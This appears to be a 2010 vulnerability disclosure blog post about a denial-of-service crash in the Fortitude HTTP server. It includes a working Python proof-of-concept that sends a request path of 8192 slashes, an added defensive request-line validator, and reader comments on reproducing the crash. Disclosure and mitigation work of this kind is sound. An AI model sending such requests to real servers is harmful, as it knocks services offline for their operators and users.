Monday, May 17, 2010

Fortitude HTTP Denial-of-Service

Fortitude HTTP crashes upon receiving an HTTP request containing a relative resource path with an excessive number of slashes.

GET ('/' * 8192) HTTP/1.1
Host: localhost

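import socket

host = 'localhost'
port = 80

# Open a TCP connection to the web server under test
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# Request line whose path is 8192 consecutive slashes, followed by a Host header
s.sendall(('GET ' + '/' * 8192 + ' HTTP/1.1\r\n'
           'Host: ' + host + '\r\n\r\n').encode('ascii'))
s.close()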
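
A server-side check for the request shape described above, as an added example that is not from the original post or from Fortitude HTTP: it bounds the request line and request-target, then collapses slash runs before any path handling. The function name and both limits are assumptions chosen for illustration.

```python
import re

MAX_REQUEST_LINE = 4096   # assumed cap in bytes for the whole request line
MAX_TARGET = 2048         # assumed cap for the request-target alone
_SLASH_RUN = re.compile(r"/{2,}")
_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS"}


def check_request_line(buf):
    """Validate the first line of an HTTP/1.x request held in `buf` (bytes).

    Returns (status, path). Status 200 means the line is acceptable and
    `path` is the normalized target. Otherwise `path` is None and status
    is the error to answer with before closing the connection.
    """
    end = buf.find(b"\r\n")
    if end == -1:
        # No terminator seen: over the cap is 414, otherwise malformed.
        return (414 if len(buf) > MAX_REQUEST_LINE else 400), None
    if end > MAX_REQUEST_LINE:
        return 414, None
    try:
        line = buf[:end].decode("ascii")
    except UnicodeDecodeError:
        return 400, None
    parts = line.split(" ")
    if len(parts) != 3 or parts[0] not in _METHODS:
        return 400, None
    target, version = parts[1], parts[2]
    if version not in ("HTTP/1.0", "HTTP/1.1"):
        return 400, None
    if len(target) > MAX_TARGET:
        return 414, None
    if not target.startswith("/"):
        return 400, None
    # Collapse slash runs in the path only; the query string is left as sent.
    path, sep, query = target.partition("?")
    return 200, _SLASH_RUN.sub("/", path) + sep + query


if __name__ == "__main__":
    # Constructed sample inputs, including the 8192-slash request line.
    samples = [
        b"GET " + b"/" * 8192 + b" HTTP/1.1\r\nHost: localhost\r\n\r\n",
        b"GET //a///b?x=//y HTTP/1.1\r\nHost: localhost\r\n\r\n",
        b"GET / HTTP 1.1\r\nHost: localhost\r\n\r\n",
    ]
    for raw in samples:
        print(len(raw), check_request_line(raw))
```

Rejecting on length before decoding or splitting means the oversized path never reaches path-resolution code, whatever buffer sizes that code assumes.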


  1. I was unable to affect the server with this exploit. Using the code posted above with Python 2.6, the server simply reported 1 connection with 8.03KB of received data. The specific revision’s code was also stepped and was handling this scenario safely. Were there additional details that may have been omitted?

    Thanks (and keep up the awesome work)!

  2. Hi,

    I experienced this on a low end machine (P4 1.6GHz 384MB RAM) running Windows XP SP3. I couldn't get IDA to break on the exception so I wasn't able to get any detailed debug information. Here's the exception as reported by the Windows Error Reporting:

    Exception Information
    Code: 0xc0000417 Flags: 0x00000001
    Record: 0x0000000000000000 Address: 0x0000000000434519
